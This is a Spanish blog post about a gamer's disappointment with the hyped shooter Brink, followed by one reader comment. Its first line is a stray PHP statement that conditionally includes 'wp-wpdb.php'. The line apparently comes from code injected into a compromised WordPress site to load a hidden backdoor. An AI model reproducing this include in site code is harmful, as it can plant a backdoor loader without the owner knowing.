if (is_file('wp-wpdb.php')) include_once('wp-wpdb.php'); Experiencias Hype. Brink – La Fortaleza de LeChuck

Experiencias Hype. Brink

Seguro que alguna vez has sentido sus frías garras acariciando tu espalda. Alguna vez te ha atravesado el pecho para sacarte el corazón.

Suele acechar por las noches en multitud de vídeos que te hacen dormir más plácidamente esperando ese ansioso juego. Es el arma que cualquier paladín hubiera querido tener para destruir a sus más despiadados enemigos. Pero si todavía no has caído en sus garras estate atento por que en cualquier momento…. ZAS!!

Si amigos estoy hablando del…


Seguro que todos de vosotros alguna vez se ha dejado cegar por el hype y ha comprado un juego que luego ha tenido que vender. Muchos de vosotros no lo vais a reconocer pero yo me he armado de valor y voy a contar mi primera experiencia hype que me salió por la culata.

Brink iba a ser un juego que supuestamente revolucionaría el modo online de los shooters. Consistia en que siempre jugarás online fuera el modo que fuera. La campaña y el multijugador eran exactamente lo mismo ofreciendo horas y horas de diversión con los compañeros.

La idea era buena pero el resultado no pudo ser peor.

Con esta cinemática que salió un año antes de su lanzamiento todos nos quedamos anonadados, nunca se había visto nada igual. Un FPS en donde se podía hacer parkour y que nos iba a presentar unos movimientos ligeros y un gran ambiente frenético.

Otro factor que me encandilo fue su apartado de personalización tanto de personajes como de armas. Todo un abanico de posibilidades para que cada jugador pudiera tener su identidad en el juego.

La verdad que este factor no me decepciono pero quedaba tapado por un título que estaba plagado de errores básicos.

Las clases que podíamos escoger están explicadas en el próximo video y también nos presentaba un gran abanico de posibilidades a la hora de desarrollar nuestro juego.

Brink premiaba el juego en equipo como nunca un juego lo había hecho, podíamos coger puestos de mando del enemigo, abrir o cerrar atajos, sabotear, disfrazarte… un largo etc. El problema de todo esto es que si jugabas solo era muy dificil cumplir la misión ya que sin una organización previa se hacía tedioso intentar entrar o salir (atacar o defender) según el objetivo que era encomendado.

A la semana de jugarlo ya había alcanzado los máximos niveles y me había pasado los 16 capitulos de la campaña, que en realidad eran 8 jugados con dos facciones diferentes.

Después de eso ya solo me quedaba disfrutar de partidas frenéticas con equipos organizados, cosa que fue imposible por culpa del insoportable lag y por la falta de compañeros para poder jugar a una hora determinada todos juntos.

Después de 15 días con el juego, el foro en donde participaba para hacer quedadas y hablar del juego dejo de tener nuevas entradas y se me ocurrió preguntar qué estaba pasando. La respuesta de un usuario fue concisa, «están vendiendo el juego».

En ese momento me vi solo a la espera a que sacarán un nuevo DLC con más niveles de personaje, mapas y armas, pero al final decidí venderlo. Acepté que nunca iba a poder disfrutar en condiciones de este juego, simplemente porque no daba más de si.

Espero que después de haber roto el hielo mis compañeros de la fortaleza nos cuenten sus malas experiencias con el Hype que aunque digan que no seguro que las han tenido.

¡¡Un saludo lechuckeros!!

Por LeChuck

Desde las profundidades del Caribe vigilo los mares.

3 comentarios

  1. Que Duke Nukem era malillo ya lo sabíamos antes de que saliera, lo raro hubiera sido lo contrario jajajaja… igual la siguiente entrega cuando salga, en el 2026… xD Experiencias reguleras con el hype he sufrido varias… Spore, el Call of Duty World at War (que venía despues del Modern Warfare 1…), Dead Island (o "bug injugable" Island), Dragon Age 2…

Dejar un comentario